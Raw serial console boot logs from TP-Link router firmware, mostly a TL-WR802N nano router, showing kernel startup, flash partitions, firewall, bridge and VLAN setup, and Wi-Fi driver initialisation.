*** MT76x0_TssiTableAdjust: A Tssi[-7 .. +7] = -128 -128 -128 -128 -15 -8 -3 * 0 * 2 12 21 127 127 127 127, offset=-10, tuning=1
MT76x0_TssiTableAdjust: A Tssi[-7 .. +7] = -128 -128 -128 -128 -25 -18 -13 * -10 * -8 2 11 117 117 117 117, offset=-10, tuning=1
mp_temperature=0xfffffff6, step = +0
MT76x0_TssiTableAdjust: upper_bound = 0x7F decimal: 127
MT76x0_TssiTableAdjust: lower_bound = 0xFFFFFF80 decimal: -128
*** MT76x0_TssiTableAdjust: A Tssi[-7 .. +7] = -128 -128 -128 -128 -18 -11 -4 * -10 * 2 21 127 127 127 127 127, offset=-10, tuning=1
MT76x0_TssiTableAdjust: A Tssi[-7 .. +7] = -128 -128 -128 -128 -28 -21 -14 * -10 * -8 11 117 117 117 117 117, offset=-10, tuning=1
mp_temperature=0xfffffff6, step = +0
3. Phy Mode = 49
AntCfgInit: primary/secondary ant 0/1
ChipStructAssign(): RALINK6590 hook !
bAutoTxAgcG = 1
MCS Set = ff 00 00 00 01
MT76x0_ChipBBPAdjust():rf_bw=2, ext_ch=1, PrimCh=36, HT-CentCh=38, VHT-CentCh=42
APStartUp(): AP Set CentralFreq at 42(Prim=36, HT-CentCh=38, VHT-CentCh=42, BBP_BW=2)
@@@ ed_monitor_init : ===>
@@@ ed_monitor_init : <===
Main bssid = 98:da:c4:6e:00:fb
<==== rt28xx_init, Status=0
0x1300 = 00064300
RTMPDrvOpen(1):Check if PDMA is idle!
RTMPDrvOpen(2):Check if PDMA is idle!
[ util_execSystem ] 139:  oal_wlan_ra_initWlan cmd is "echo 1 > /proc/tplink/led_wlan_5G"
[ util_execSystem ] 139:  oal_wlan_ra_setStaNum cmd is "iwpriv rai0 set MaxStaNum=32"
[ util_execSystem ] 139:  device rai0 entered promiscuous mode
oal_br_addIntfInbr0: port 8(rai0) entering forwarding state
toBridge cmd is br0: port 8(rai0) entering forwarding state
"brctl addif br0 rai0"
[ util_execSystem ] 139:  oal_br_addIntfIntoBridge cmddevice apclii0 entered promiscuous mode
 is "brctl addif br0 apclii0"
[ util_execSystem ] 139:  oal_br_addIntfIntoBridevice rai1 entered promiscuous mode
dge cmd is "brctl addif br0 rai1"

wlNetlinkTool isspiflash_ioctl_read, Read from 0x007f8000 length 0x2, ret 0, retlen 0x2
 already there.
[ util_execSystem ] 139:  oal_wlan_ra_initEnd cmd is "killall -q wscd_5G"
[ util_execSystem ] 166:  execute ok, exit status = 1
[ util_execSystem ] 139:  oal_wlan_ra_initEnd cmd is "wscd_5G -i rai0 -m 1 -w /var/tmp/wsc_upnp_5G/ &"
[ util_execSystem ] 139:  rsl_initLanWlanObj cmd is "echo 0 > /proc/tplink/wl_mode"

wscd: SSDP UDP PORT = 1900
sendto: No such file or directory
pid 777 send 2030 error
sendto: No such file or directory
pid 777 send 2004 error
[ util_execSystem ] 139:  oal_startDhcps cmd is "dhcpd /var/tmp/dconf/udhcpd.conf"
[ util_execSystem ] 139:  oal_lan6_startDhcp6s cmd is "dhcp6s -c /var/tmp/dconf/dhcp6s_br0.conf -P /var/run/dhcp6s_br0.pid br0 &"
[ util_execSystem ] 139:  oal_lan6_startRadvd cmd is "radvd -C /var/tmp/dconf/radvd_br0.conf -p /var/run/radvd_br0.pid &"
[ util_execSystem ] 139:  oal_br_delIntfFromBridge cmd is "brctl delif br0 eth0.2"

mldProxy# file: src/mld_ifinfo.c;line: 102; error = No such file or directory
mldProxy# Err: get LLA failed
iptables: Bad rule (does a matching rule exist in that chain?).
brctl: bridge br0: Invalid argument
[ util_execSystem ] 166:  execute ok, exit status = 1
[ util_execSystem ] 139:  oal_intf_setIfMac cmd is "ifconfig eth0.2 down"
[ util_execSystem ] 139:  oal_intf_setIfMac cmd is "ifconfig eth0.2 hw ether 98:DA:C4:6E:00:FD up"
[ util_execSystem ] 139:  oal_intf_enableIntf cmd is "ifconfig eth0.2 up"

radvd starting
[Jan 01 00:00:09] radvd: no linklocal address configured for br0
[Jan 01 00:00:09] radvd: error parsing or activating the config file: /var/tmp/dconf/radvd_br0.conf
[ rsl_initAppObj ] 787:  ==> start dhcp client
[ util_execSystem ] 139:  oal_rip_updateConfig cmd is "rm -f /var/tmp/dconf/zebra.conf"
[ util_execSystem ] 139:  oal_rip_updateConfig cmd is "rm -f /var/tmp/dconf/ripd.conf"
[ util_execSystem ] 139:  removeAllRIPIpTableRule cmd is "iptables -L INPUT -v --line-numbers > /var/iptable"

[ getPidFromPidFile ] 112:  Cann't open file: /var/run/zebra.pid.
[ util_execSystem ] 139:  controlRipProcess cmd is "zebra -d -f /var/tmp/dconf/zebra.conf"

[ getPidFromPidFile ] 112:  Cann't open file: /var/run/ripd.pid.
[ util_execSystem ] 139:  oal_ipt_fwDdos cmd is "iptables -D FORWARD -j FIREWALL_DDOS
"

iptables: No chain/target/match by that name.
[ util_execSystem ] 166:  execute ok, exit status = 1
[ util_execSystem ] 139:  oal_ipt_forbidLanPing cmd is "iptables -t filter -D INPUT -i br+ -p icmp --icmp-type echo-request -j DROP
iptables -t filter -D FORWARD -i br+ -p icmp --icmp-type echo-request -j DROP
"

iptables: Bad rule (does a matching rule exist in that chain?).
iptables: Bad rule (does a matching rule exist in that chain?).
[ util_execSystem ] 166:  execute ok, exit status = 1
[ util_execSystem ] 139:  oal_ddos_delPingRule cmd is "iptables -t filter -D INPUT ! -i br+ -p icmp --icmp-type echo-request -j ACCEPT
"

iptables: Bad rule (does a matching rule exist in that chain?).
[ util_execSystem ] 166:  execute ok, exit status = 1
[ util_execSystem ] 139:  oal_ipt_setDDoSRules cmd is "iptables -F FIREWALL_DDOS"
[ util_execSystem ] 139:  ddos_clearAll cmd is "rm -f /var/tmp/dosHost"
[ util_execSystem ] 139:  oal_initFirewallObj cmd is "ebtables -N FIREWALL"
[ util_execSystem ] 139:  oal_initIp6FirewallObj cmd is "ip6tables -F"
[ util_execSystem ] 139:  oal_initIp6FirewallObj cmd is "ip6tables -X"
[ util_execSystem ] 139:  oal_initIp6FirewallObj cmd is "ip6tables -P INPUT ACCEPT"
[ util_execSystem ] 139:  oal_initIp6FirewallObj cmd is "ip6tables -P FORWARD DROP"
[ util_execSystem ] 139:  oal_initIp6FirewallObj cmd is "ip6tables -P OUTPUT ACCEPT"
[ util_execSystem ] 139:  oal_initIp6FirewallObj cmd is "ip6tables -N FIREWALL"
[ util_execSystem ] 139:  oal_initIp6FirewallObj cmd is "ip6tables -N FWRULE"
[ util_execSystem ] 139:  oal_initIp6FirewallObj cmd is "ip6tables -N SETMSS"
[ util_execSystem ] 139:  oal_initIp6FirewallObj cmd is "ip6tables -A INPUT -i lo -p ALL -j ACCEPT -m comment                                   --comment "loop back""
[ util_execSystem ] 139:  oal_initIp6FirewallObj cmd is "ip6tables -A INPUT  -m conntrack --ctstate RELATED,ESTABLISHED -j ACCEPT"
[ util_execSystem ] 139:  oal_initIp6FirewallObj cmd is "ip6tables -A INPUT -i br+ -p tcp --dport 23 -j ACCEPT"
[ util_execSystem ] 139:  oal_initIp6FirewallObj cmd is "ip6tables -A INPUT -p tcp --dport 23 -j DROP"
[ util_execSystem ] 139:  oal_initIp6FirewallObj cmd is "ip6tables -A INPUT -i br+ -p icmpv6 --icmpv6-type echo-request -j ACCEPT"
[ util_execSystem ] 139:  oal_initIp6FirewallObj cmd is "ip6tables -A INPUT -p icmpv6 --icmpv6-type echo-request -j DROP"
[ util_execSystem ] 139:  oal_initIp6FirewallObj cmd is "ip6tables -A FORWARD -i br+ -m conntrack --ctstate RELATED,ESTABLISHED -j ACCEPT"
[ util_execSystem ] 139:  oal_initIp6FirewallObj cmd is "ip6tables -A FORWARD -o br+ -m conntrack --ctstate RELATED,ESTABLISHED -j ACCEPT"
[ util_execSystem ] 139:  oal_initIp6FirewallObj cmd is "ip6tables -A FORWARD -j FIREWALL"
[ util_execSystem ] 139:  oal_initIp6FirewallObj cmd is "ip6tables -I FORWARD 1 -j SETMSS"
[ util_execSystem ] 139:  oal_fw6_setFwEnabeld cmd is "ip6tables -D FIREWALL -j ACCEPT"

ip6tables: Bad rule (does a matching rule exist in that chain?).
[ util_execSystem ] 166:  execute ok, exit status = 1
[ util_execSystem ] 139:  oal_fw6_setFwEnabeld cmd is "ip6tables -F FIREWALL"
[ util_execSystem ] 139:  oal_fw6_setFwEnabeld cmd is "ip6tables -A FIREWALL -j ACCEPT"

[ rsl_setStorageServiceObj ] 1024:  mountFlag is 3,We start usb server
[ util_execSystem ] 139:  oal_killDlnaMediaSeverProcess cmd is "killall ushare"

killall: ushare: no process killed
[ util_execSystem ] 166:  execute ok, exit status = 1
[ util_execSystem ] 139:  oal_sys_unsetTZ cmd is "echo "" > /etc/TZ"

uShare (version 1.1a), a lightweight UPnP A/V and DLNA Media Server.
Benjamin Zores (C) 2005-2007, for GeeXboX Team.
See http://ushare.geexbox.org/ for updates.
[ util_execSystem ] 139:  oal_ipt_setWanPort cmd is "iptables -t filter -D INPUT -p tcp --dport 21 -j ACCEPT"

iptables: Bad rule (does a matching rule exist in that chain?).
[ util_execSystem ] 166:  execute ok, exit status = 1
[ util_execSystem ] 139:  oal_ipt_setWanPort cmd is "iptables -t nat -D PREROUTING -p tcp --dport 21 -j ACCEPT"

iptables: Bad rule (does a matching rule exist in that chain?).
[ util_execSystem ] 166:  execute ok, exit status = 1
[ util_execSystem ] 139:  oal_startSamba cmd is "smbd -D"
[ util_execSystem ] 139:  setupModules cmd is "insmod /lib/modules/kmdir/kernel/net/netfilter/nf_conntrack_ftp.ko"
[ util_execSystem ] 139:  setupModules cmd is "insmod /lib/modules/kmdir/kernel/net/ipv4/netfilter/nf_nat_ftp.ko"
[ util_execSystem ] 139:  oal_openAlg cmd is "iptables -D FORWARD_VPN_PASSTHROUGH  -p udp --dport 500 -j DROP"

iptables: Bad rule (does a matching rule exist in that chain?).
[ util_execSystem ] 166:  execute ok, exit status = 1
[ util_execSystem ] 139:  setupModules cmd is "insmod /lib/modules/kmdir/kernel/net/ipv4/netfilter/nf_nat_proto_gre.ko"
[ util_execSystem ] 139:  setupModules cmd is "insmod /lib/modules/kmdir/kernel/net/ipv4/netfilter/nf_nat_pptp.ko"
[ util_execSystem ] 139:  oal_openAlg cmd is "iptables -D FORWARD_VPN_PASSTHROUGH  -p tcp --dport 1723 -j DROP"

iptables: Bad rule (does a matching rule exist in that chain?).
[ util_execSystem ] 166:  execute ok, exit status = 1
[ util_execSystem ] 139:  oal_openAlg cmd is "iptables -D FORWARD_VPN_PASSTHROUGH  -p udp --dport 1701 -j DROP"

iptables: Bad rule (does a matching rule exist in that chain?).
[ util_execSystem ] 166:  execute ok, exit status = 1
[ util_execSystem ] 139:  setupModules cmd is "insmod /lib/modules/kmdir/kernel/net/netfilter/nf_conntrack_tftp.ko"
[ util_execSystem ] 139:  setupModules cmd is "insmod /lib/modules/kmdir/kernel/net/ipv4/netfilter/nf_nat_tftp.ko"
[ util_execSystem ] 139:  setupModules cmd is "insmod /lib/modules/kmdir/kernel/net/netfilter/nf_conntrack_h323.ko"
[ util_execSystem ] 139:  setupModules cmd is "insmod /lib/modules/kmdir/kernel/net/ipv4/netfilter/nf_nat_h323.ko"
[ util_execSystem ] 139:  setupModules cmd is "insmod /lib/modules/kmdir/kernel/net/netfilter/nf_conntrack_sip.ko"
[ util_execSystem ] 139:  setupModules cmd is "insmod /lib/modules/kmdir/kernel/net/ipv4/netfilter/nf_nat_sip.ko"
[ util_execSystem ] 139:  setupModules cmd is "insmod /lib/modules/kmdir/kernel/net/netfilter/nf_conntrack_rtsp.ko"
[ util_execSystem ] 139:  setupModules cmd is "insmod /lib/modules/kmdir/kernel/net/ipv4/netfilter/nf_nat_rtsp.ko"

nf_nat_rtsp v0.6.21 loading
gpiomode1 55144444.
gpiomode2 00000445.
enable switch phyport...
Set: phy[0].reg[0] = 3900
[cmd_dutInit():1059] init shm
[tddp_taskEntry():151] tddp task start
Set: phy[1].reg[0] = 3900
Set: phy[2].reg[0] = 3900
Set: phy[3].reg[0] = 3900
Set: phy[4].reg[0] = 3900
Set: phy[0].reg[0] = 3300
Set: phy[1].reg[0] = 3300
Set: phy[2].reg[0] = 3300
Set: phy[3].reg[0] = 3300
Set: phy[4].reg[0] = 3300
resetMiiPortV over.
[ util_execSystem ] 139:  prepareDropbear cmd is "dropbearkey -t rsa -f /var/tmp/dropbear/dropbear_rsa_host_key"

Will output 1024 bit rsa secret key to '/var/tmp/dropbear/dropbear_rsa_host_key'
Generating key, this may take a while...
[ util_execSystem ] 139:  prepareDropbear cmd is "dropbearkey -t dss -f /var/tmp/dropbear/dropbear_dss_host_key"

Will output 1024 bit dss secret key to '/var/tmp/dropbear/dropbear_dss_host_key'
Generating key, this may take a while...
[ util_execSystem ] 139:  prepareDropbear cmd is "dropbear -p 22 -r /var/tmp/dropbear/dropbear_rsa_host_key -d /var/tmp/dropbear/dropbear_dss_host_key -A /var/tmp/dropbear/dropbearpwd"


~ #

TL-WR802N: Wireless N - Nano Router

115200 (8N1)

Linux version 2.6.36 (jenkins@mobile-System) (gcc version 4.6.3 (Buildroot 2012.11.1) ) #1 Sun Apr 28 17:33:31 CST 2019

 The CPU feqenuce set to 575 MHz

 MIPS CPU sleep mode enabled.
CPU revision is: 00019655 (MIPS 24Kc)
Software DMA cache coherency
Determined physical RAM map:
 memory: 04000000 @ 00000000 (usable)
Initrd not found or empty - disabling initrd
Zone PFN ranges:
  Normal   0x00000000 -> 0x00004000
Movable zone start PFN for each node
early_node_map[1] active PFN ranges
    0: 0x00000000 -> 0x00004000
Built 1 zonelists in Zone order, mobility grouping on.  Total pages: 16256
Kernel command line: console=ttyS1,115200 root=/dev/mtdblock2 rootfstype=squashfs init=/sbin/init
PID hash table entries: 256 (order: -2, 1024 bytes)
Dentry cache hash table entries: 8192 (order: 3, 32768 bytes)
Inode-cache hash table entries: 4096 (order: 2, 16384 bytes)
Primary instruction cache 64kB, VIPT, , 4-waylinesize 32 bytes.
Primary data cache 32kB, 4-way, PIPT, no aliases, linesize 32 bytes
Writing ErrCtl register=0005e136
Readback ErrCtl register=0005e136
Memory: 61424k/65536k available (2414k kernel code, 4112k reserved, 636k data, 160k init, 0k highmem)
NR_IRQS:128
console [ttyS1] enabled
Calibrating delay loop... 386.04 BogoMIPS (lpj=772096)
pid_max: default: 4096 minimum: 301
Mount-cache hash table entries: 512
NET: Registered protocol family 16
bio: create slab <bio-0> at 0
Switching to clocksource Ralink Systick timer
NET: Registered protocol family 2
IP route cache hash table entries: 1024 (order: 0, 4096 bytes)
TCP established hash table entries: 2048 (order: 2, 16384 bytes)
TCP bind hash table entries: 2048 (order: 1, 8192 bytes)
TCP: Hash tables configured (established 2048 bind 2048)
TCP reno registered
NET: Registered protocol family 1
squashfs: version 4.0 (2009/01/31) Phillip Lougher
fuse init (API version 7.15)
msgmni has been set to 119
io scheduler noop registered
io scheduler deadline registered (default)
Ralink gpio driver initialized
i2cdrv_major = 218
Serial: 8250/16550 driver, 2 ports, IRQ sharing enabled
serial8250: ttyS0 at MMIO 0x10000d00 (irq = 21) is a 16550A
serial8250: ttyS1 at MMIO 0x10000c00 (irq = 20) is a 16550A
brd: module loaded
flash manufacture id: ef, device id 40 17
W25Q64BV(ef 40170000) (8192 Kbytes)
mtd .name = raspi, .size = 0x00800000 (8M) .erasesize = 0x00010000 (64K) .numeraseregions = 0
Creating 7 MTD partitions on "raspi":
0x000000000000-0x000000020000 : "boot"
0x000000020000-0x000000160000 : "kernel"
0x000000160000-0x0000007c0000 : "rootfs"
mtd: partition "rootfs" set to be root filesystem
0x0000007c0000-0x0000007d0000 : "config"
0x0000007d0000-0x0000007e0000 : "romfile"
0x0000007e0000-0x0000007f0000 : "rom"
0x0000007f0000-0x000000800000 : "radio"
Register flash device:flash0
PPP generic driver version 2.4.2
PPP MPPE Compression module registered
NET: Registered protocol family 24
Mirror/redirect action on
u32 classifier
    Actions configured
Netfilter messages via NETLINK v0.30.
nf_conntrack version 0.5.0 (959 buckets, 3836 max)
ip_tables: (C) 2000-2006 Netfilter Core Team, Type=Linux
TCP cubic registered
NET: Registered protocol family 10
ip6_tables: (C) 2000-2006 Netfilter Core Team
IPv6 over IPv4 tunneling driver
NET: Registered protocol family 17
Ebtables v2.0 registered
802.1Q VLAN Support v1.8 Ben Greear <greearb@candelatech.com>
All bugs added by David S. Miller <davem@redhat.com>
VFS: Mounted root (squashfs filesystem) readonly on device 31:2.
Freeing unused kernel memory: 160k freed
starting pid 34, tty '': '/etc/init.d/rcS'
cp: can't stat '/etc/SingleSKU_FCC.dat': No such file or directory
rdm_major = 253
spiflash_ioctl_read, Read from 0x007df100 length 0x6, ret 0, retlen 0x6
Read MAC from flash(  7df100) 74-ffffffda-ffffff88-fffffffc-ffffffc3-ffffffae
GMAC1_MAC_ADRH -- : 0x000074da
GMAC1_MAC_ADRL -- : 0x88fcc3ae
Ralink APSoC Ethernet Driver Initilization. v3.1  256 rx/tx descriptors allocated, mtu = 1500!
NAPI enable, Tx Ring = 256, Rx Ring = 256
spiflash_ioctl_read, Read from 0x007df100 length 0x6, ret 0, retlen 0x6
Read MAC from flash(  7df100) 74-ffffffda-ffffff88-fffffffc-ffffffc3-ffffffae
GMAC1_MAC_ADRH -- : 0x000074da
GMAC1_MAC_ADRL -- : 0x88fcc3ae
PROC INIT OK!
add domain:tplinkwifi.net
add domain:tplinkap.net
add domain:tplinkrepeater.net
add domain:tplinklogin.net
tp_domain init ok
L2TP core driver, V2.0
PPPoL2TP kernel driver, V2.0
Set: phy[0].reg[0] = 3900
Set: phy[1].reg[0] = 3900
Set: phy[2].reg[0] = 3900
Set: phy[3].reg[0] = 3900
Set: phy[4].reg[0] = 3900
Set: phy[0].reg[0] = 3300
Set: phy[1].reg[0] = 3300
Set: phy[2].reg[0] = 3300
Set: phy[3].reg[0] = 3300
Set: phy[4].reg[0] = 3300
resetMiiPortV over.
Set: phy[0].reg[4] = 01e1
Set: phy[0].reg[0] = 3300
Set: phy[1].reg[4] = 01e1
Set: phy[1].reg[0] = 3300
Set: phy[2].reg[4] = 01e1
Set: phy[2].reg[0] = 3300
Set: phy[3].reg[4] = 01e1
Set: phy[3].reg[0] = 3300
Set: phy[4].reg[4] = 01e1
Set: phy[4].reg[0] = 3300
turn off flow control over.
starting pid 82, tty '/dev/ttyS1': '/bin/sh'
~ # [ util_execSystem ] 141:  ipt_init cmd is "/var/tmp/dconf/rc.router"

[ dm_readFile ] 2061:  can not open xml file /var/tmp/pc/reduced_data_model.xml!, about to open file /etc/reduced_data_model.xml
spiflash_ioctl_read, Read from 0x007c0000 length 0x10000, ret 0, retlen 0x10000
spiflash_ioctl_read, Read from 0x007c0000 length 0xa1b0, ret 0, retlen 0xa1b0
===>Enter Routerspiflash_ioctl_read, Read from 0x007df100 length 0x6, ret 0, retlen 0x6
 mode
[ oal_sys_readMaspiflash_ioctl_read, Read from 0x007df200 length 0x4, ret 0, retlen 0x4
cFlash ] 1174:  spiflash_ioctl_read, Read from 0x007df300 length 0x4, ret 0, retlen 0x4
set flash mac : spiflash_ioctl_read, Read from 0x007df400 length 0x10, ret 0, retlen 0x10
74:DA:88:FC:C3:Aspiflash_ioctl_read, Read from 0x007df500 length 0x29, ret 0, retlen 0x29
E.
spiflash_ioctl_read, Read from 0x007df600 length 0x21, ret 0, retlen 0x21
spiflash_ioctl_read, Read from 0x007df700 length 0x10, ret 0, retlen 0x10
spiflash_ioctl_read, Read from 0x007df700 length 0x10, ret 0, retlen 0x10
spiflash_ioctl_read, Read from 0x00020000 length 0x1d0, ret 0, retlen 0x1d0
spiflash_ioctl_read, Read from 0x007df100 length 0x6, ret 0, retlen 0x6
[ oal_sys_readMacFlash ] 1174:  set flash mac : 74:DA:88:FC:C3:AE.
sendto: No such file or directory
pid 81 send 2001 error
Get SNTP new config
[ util_execSystem ] 141:  oal_startDynDns cmd is "dyndns /var/tmp/dconf/dyndns.conf"
[ util_execSystem ] 141:  oal_startNoipDns cmd is "noipdns /var/tmp/dconf/noipdns.conf"
[ util_execSystem ] 141:  oal_startCmxDns cmd is "cmxdns /var/tmp/dconf/cmxdns.conf"

ioctl: No such device
[ util_execSystem ] 141:  oal_br_addBridge cmd is "brctl addbr br0;brctl setfd br0 0;brctl stp br0 off"
[ util_execSystem ] 141:  oal_ipt_addLanRules cmd is "iptables -t filter -A INPUT -i br+ -j ACCEPT
[ util_execSystem ] 141:  oal_intf_setIntf cmd is "ifconfig br0 192.168.1.1 netmask 255.255.255.0 up"
[ util_execSystem ] 141:  oal_util_setProcLanAddr cmd is "echo "br0 16885952,"Raeth v3.1 ( > /proc/net/conNAPI
ntract_LocalAddr,SkbRecycle"

[ util_exec)
System ] 141:  o
phy_tx_ring = 0x030cf000, tx_ring = 0xa30cf000
al_intf_enableIn
phy_rx_ring0 = 0x030d0000, rx_ring0 = 0xa30d0000
tf cmd is "ifcon[fe_sw_init:5350]rt305x_esw_init.
fig eth0 up"

disable switch phyport...
GMAC1_MAC_ADRH -- : 0x000074da
GMAC1_MAC_ADRL -- : 0x88fcc3ae
RT305x_ESW: Link Status Changed
[ rsl_getUnusedVlan ] 1079:  GET UNUSED VLAN TAG 1 : [3]
[ rsl_getUnusedVlan ] 1079:  GET UNUSED VLAN TAG 2 : [4]
[ rsl_getUnusedVlan ] 1079:  GET UNUSED VLAN TAG 3 : [5]
[ rsl_getUnusedVlan ] 1079:  GET UNUSED VLAN TAG 4 : [6]
[ util_execSystem ] 141:  oal_addVlanTagIntf cmd is "vconfig add eth0 3"
[ util_execSystem ] 141:  oal_intf_enableIntf cmd is "ifconfig eth0.3 up"

set if eth0.3 to *not wan dev
[ util_execSystem ] 141:  oal_addVlanTagIntf cmd is "vconfig add eth0 4"
[ util_execSystem ] 141:  oal_intf_enableIntf cmd is "ifconfig eth0.4 up"

set if eth0.4 to *not wan dev
[ util_execSystem ] 141:  oal_addVlanTagIntf cmd is "vconfig add eth0 5"
[ util_execSystem ] 141:  oal_intf_enableIntf cmd is "ifconfig eth0.5 up"

set if eth0.5 to *not wan dev
[ util_execSystem ] 141:  oal_addVlanTagIntf cmd is "vconfig add eth0 6"
[ util_execSystem ] device eth0.3 entered promiscuous mode
141:  oal_intf_edevice eth0 entered promiscuous mode
nableIntf cmd isbr0: port 1(eth0.3) entering forwarding state
 "ifconfig eth0.br0: port 1(eth0.3) entering forwarding state
6 up"

set if eth0.6 to *not wan dev
[ util_execSystem ] 141:  oal_addVlanTagdevice eth0.4 entered promiscuous mode
Intf cmd is "vcobr0: port 2(eth0.4) entering forwarding state
nfig add eth0 2"br0: port 2(eth0.4) entering forwarding state

[ util_execSystem ] 141:  oal_intf_enableIntf cmd is "ifconfig eth0.2 up"
device eth0.5 entered promiscuous mode

set if eth0.2 tbr0: port 3(eth0.5) entering forwarding state
o wan dev
[ vlabr0: port 3(eth0.5) entering forwarding state
n_addLanPortsIntoBridge ] 606:  add lan Port 255 from br0
[ util_execSystem ] 1device eth0.6 entered promiscuous mode
41:  oal_br_addIbr0: port 4(eth0.6) entering forwarding state
ntfIntoBridge cmbr0: port 4(eth0.6) entering forwarding state
d is "brctl addif br0 eth0.3"
[ util_execSystem ] 141:  oal_br_addIntfIntoBridge cmd is "brctl addif br0 eth0.4"
[ util_execSystem ] 141:  oal_br_addIntfIntoBridge cmd is "brctl addif br0 eth0.5"
[ util_execSystem ] 141:  oal_br_addIntfIntoBridge cmd is "brctl addif br0 eth0.6"
[ util_execSystem ] 141:  rsl_initIPv6CfgObj cmd is "echo 1 > /proc/sys/net/ipv6/conf/all/disable_ipv6"
[ util_execSystem ] 141:  oal_eth_setIGMPSnoopParam cmd is "for i in /sys/devices/virtual/net/*/bridge/multicast_snooping;do echo 1 > $i ; done"
[ util_execSystem ] 141:  oal_wlan_ra_setCountryRegion cmd is "cp /etc/SingleSKU_CE.dat /var/Wireless/RT2860AP/SingleSKU.dat"
[ util_execSystem ] 141:  oal_wlan_ra_setCountryRegion cmd is "iwpriv ra0 set CountryRegion=1"

ra0       no private ioctls.
[ util_execSystem ] 141:  oal_wlan_ra_loadDriver cmd is "insmod /lib/modules/kmdir/kernel/drivers/net/wireless/mt_wifi_ap/mt_wifi.ko"

ADDRCONF(NETDEV_CHANGE): eth0.4: link becomes ready
ADDRCONF(NETDEV_CHANGE): eth0.5: link becomes ready
ADDRCONF(NETDEV_CHANGE): eth0.6: link becomes ready
ADDRCONF(NETDEV_CHANGE): eth0.2: link becomes ready


=== pAd = c085d000, size = 1509896 ===

<-- RTMPAllocTxRxRingMemory, Status=0, ErrorValue=0x
<-- RTMPAllocAdapterBlock, Status=0
RtmpChipOpsHook(492): Not support for HIF_MT yet!
mt7628_init()-->
mt7628_init(FW(8a00), HW(8a01), CHIPID(7628))
e2.bin mt7628_init(1156)::(2), pChipCap->fw_len(64560)
mt_bcn_buf_init(218): Not support for HIF_MT yet!
<--mt7628_init()
[ util_execSystem ] 141:  oal_wlan_ra_initWlan cmd is "ifconfig ra0 up"

TX_BCN DESC a32b6000 size = 320
RX[0] DESC a32b8000 size = 2048
RX[1] DESC a32b9000 size = 2048
RT_CfgSetApcliMacAddress : invalid mac setting
cfg_mode=9
cfg_mode=9
wmode_band_equal(): Band Equal!
AndesSendCmdMsg: Could not send in band command due to diable fRTMP_ADAPTER_MCU_SEND_IN_BAND_CMD
APSDCapable[0]=0
APSDCapable[1]=0
APSDCapable[2]=0
APSDCapable[3]=0
APSDCapable[4]=0
APSDCapable[5]=0
APSDCapable[6]=0
APSDCapable[7]=0
APSDCapable[8]=0
APSDCapable[9]=0
APSDCapable[10]=0
APSDCapable[11]=0
APSDCapable[12]=0
APSDCapable[13]=0
APSDCapable[14]=0
APSDCapable[15]=0
default ApCliAPSDCapable[0]=0
Key1Str is Invalid key length(0) or Type(0)
Key1Str is Invalid key length(0) or Type(0)
Key2Str is Invalid key length(0) or Type(0)
Key2Str is Invalid key length(0) or Type(0)
Key3Str is Invalid key length(0) or Type(0)
Key3Str is Invalid key length(0) or Type(0)
Key4Str is Invalid key length(0) or Type(0)
Key4Str is Invalid key length(0) or Type(0)
WscKeyASCII=8
WscKeyASCII=8
[RTMPReadParametersHook:297]wifi read profile faild.
load fw image from fw_header_image
AndesMTLoadFwMethod1(2263)::pChipCap->fw_len(64560)
FW Version:1
FW Build Date:20161213152835
CmdAddressLenReq:(ret = 0)
CmdFwStartReq: override = 1, address = 1048576
CmdStartDLRsp: WiFI FW Download Success
MtAsicDMASchedulerInit(): DMA Scheduler Mode=0(LMAC)
efuse_probe: efuse = 10000012
RtmpChipOpsEepromHook::e2p_type=0, inf_Type=4
RtmpEepromGetDefault::e2p_dafault=2
RtmpChipOpsEepromHook: E2P type(2), E2pAccessMode = 2, E2P default = 2
NVM is FLASH mode
1. Phy Mode = 14
exec!
spiflash_ioctl_read, Read from 0x007f0000 length 0x400, ret 0, retlen 0x400
tx or rx disable[f0000300][count=0]!!!
eeFlashId = 0x7628!
tx or rx disable[f0000300][count=1]!!!
Country Region from e2p = ffff
tssi_1_target_pwr_g_band = 34
2. Phy Mode = 14
3. Phy Mode = 14
NICInitPwrPinCfg(11): Not support for HIF_MT yet!
NICInitializeAsic(651): Not support rtmp_mac_sys_reset () for HIF_MT yet!
mt_mac_init()-->
MtAsicInitMac()-->
mt7628_init_mac_cr()-->
MtAsicSetMacMaxLen(1277): Set the Max RxPktLen=450!
<--mt_mac_init()
        WTBL Segment 1 info:
tx or rx disable[f0000300][count=2]!!!
Reset tx rx bit!!!
                MemBaseAddr/FID:0x28000/0
                EntrySize/Cnt:32/128
        WTBL Segment 2 info:
                MemBaseAddr/FID:0x40000/0
                EntrySize/Cnt:64/128
        WTBL Segment 3 info:
                MemBaseAddr/FID:0x42000/64
                EntrySize/Cnt:64/128
        WTBL Segment 4 info:
                MemBaseAddr/FID:0x44000/128
                EntrySize/Cnt:32/128
AntCfgInit(2940): Not support for HIF_MT yet!
MCS Set = ff ff 00 00 01
MtAsicSetChBusyStat(861): Not support for HIF_MT yet!
FW LOG: !!!! Pass, dont need recal (total fail[0])

FW LOG: !!!! Pass, dont need recal (total fail[0])

FW LOG: !!!! Pass, dont need recal (total fail[0])

FW LOG: RxDCOC Set DC Valid(8)(2)

tx or rx disable[f0000300][count=0]!!!
CmdSlotTimeSet:(ret = 0)
[PMF]ap_pmf_init:: apidx=0, MFPC=0, MFPR=0, SHA256=0
[PMF]RTMPMakeRsnIeCap: RSNIE Capability MFPC=0, MFPR=0
[PMF]ap_pmf_init:: apidx=1, MFPC=0, MFPR=0, SHA256=0
MtAsicSetRalinkBurstMode(3156): Not support for HIF_MT yet!
MtAsicSetPiggyBack(796): Not support for HIF_MT yet!
reload DPD from flash , 0x9F = [ca00] doReload bit7[0]
CmdLoadDPDDataFromFlash: Channel = 3, DoReload = 0
MtAsicSetTxPreamble(3135): Not support for HIF_MT yet!
MtAsicAddSharedKeyEntry(1344): Not support for HIF_MT yet!
The 4-BSSID mode is enabled, the BSSID byte5 MUST be the multiple of 4
MtAsicSetPreTbtt(): bss_idx=0, PreTBTT timeout = 0xf0
ap_ftkd> Initialize FT KDP Module...
Main bssid = 74:da:88:fc:c3:ae
<==== rt28xx_init, Status=0
@@@ ed_monitor_init : ===>
@@@ ed_monitor_init : <===
mt7628_set_ed_cca: TURN ON EDCCA mac 0x10618 = 0xd7c87d0f, EDCCA_Status=1
WiFi Startup Cost (ra0): 3.464s
[ util_execSystem ] 141:  oal_wlan_ra_initWlan cmd is "echo 1 > /proc/tplink/led_wlan_24G"
[ util_execSystem ] 141:  oal_wlanSet_ed_chk_proc()::ed_chk=0
